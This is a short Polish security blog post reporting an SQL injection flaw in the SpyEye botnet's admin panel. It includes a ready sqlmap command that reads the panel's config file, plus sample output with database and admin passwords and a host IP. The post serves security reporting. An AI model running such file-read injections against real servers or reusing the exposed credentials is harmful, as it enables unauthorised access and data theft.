12:46
5/5/2011

* SpyEye SQL injection

Nawet oprogramowanie wykorzystujące dziury ma swoje dziury :] Jeden z parametrów w panelu zarządzania SpyEye jest podatny na ataki SQL injection. Aby przy pomocy tego błędu wydobyć plik konfiguracyjny botnetu, można użyć sqlmapa z poniższymi parametrami:

./sqlmap.py -u"http://x.x.x.x/formgrab/frm_findrep_sub2.php?id=1" --file-read=/var/www/formgrab/config.php

Wynik będzie podobny do tego:

cat output/76.73.17.90/files/_var_www_s3_fr3
<?php
# Database
define('DB_SERVER', 'localhost');
define('DB_NAME', 'fra');
define('DB_USER', 'root');
define('DB_PASSWORD', '1234TTab123xsdesd568');
# Admin
define('ADMIN_PASSWORD', 'hdjsd898oiSDKfsdf32423ncc');
?>

Podatność opublikował quantumbenxh, który niezbyt uważnie usunął adres IP zainfekowanego hosta. W jego poście znajdziecie też panel SpyEye — można poszukać kolejnych SQL injections [i innych błędów] na własną rękę.

Ten wpis pochodzi z naszego linkbloga *ptr, dlatego nie widać go na głównej.
*ptr możesz czytać przez RSS albo przez sidebar po prawej stronie serwisu.

Dowiedz się, jak zabezpieczyć swoje dane i pieniądze przed cyberprzestępcami. Wpadnij na nasz kultowy ~3 godzinny wykład pt. "Jak nie dać się zhackować?" i poznaj kilkadziesiąt praktycznych i przede wszystkim prostych do zastosowania porad, które skutecznie podniosą Twoje bezpieczeństwo i pomogą ochronić przed atakami Twoich najbliższych. Uczestnicy tego wykładu oceniają go na: 9,34/10!

Na ten wykład powinien przyjść każdy, kto korzysta z internetu na smartfonie lub komputerze, prywatnie albo służbowo. Wykład prowadzimy prostym językiem, wiec zrozumie go każdy, także osoby spoza branży IT. Dlatego na wykład możesz spokojnie przyjść ze swoimi rodzicami lub mniej technicznymih znajomych. W najbliższych tygodniach będziemy w poniższych miastach:

Zobacz pełen opis wykładu klikając tutaj lub kup bilet na wykład klikając tu.

1 komentarz

Dodaj komentarz
  1. do bani, avast blokuje mi pobranie sqlmapa

Twój komentarz

Zamieszczając komentarz akceptujesz regulamin dodawania komentarzy. Przez moderację nie przejdą: wycieczki osobiste, komentarze nie na temat, wulgaryzmy.

RSS dla komentarzy: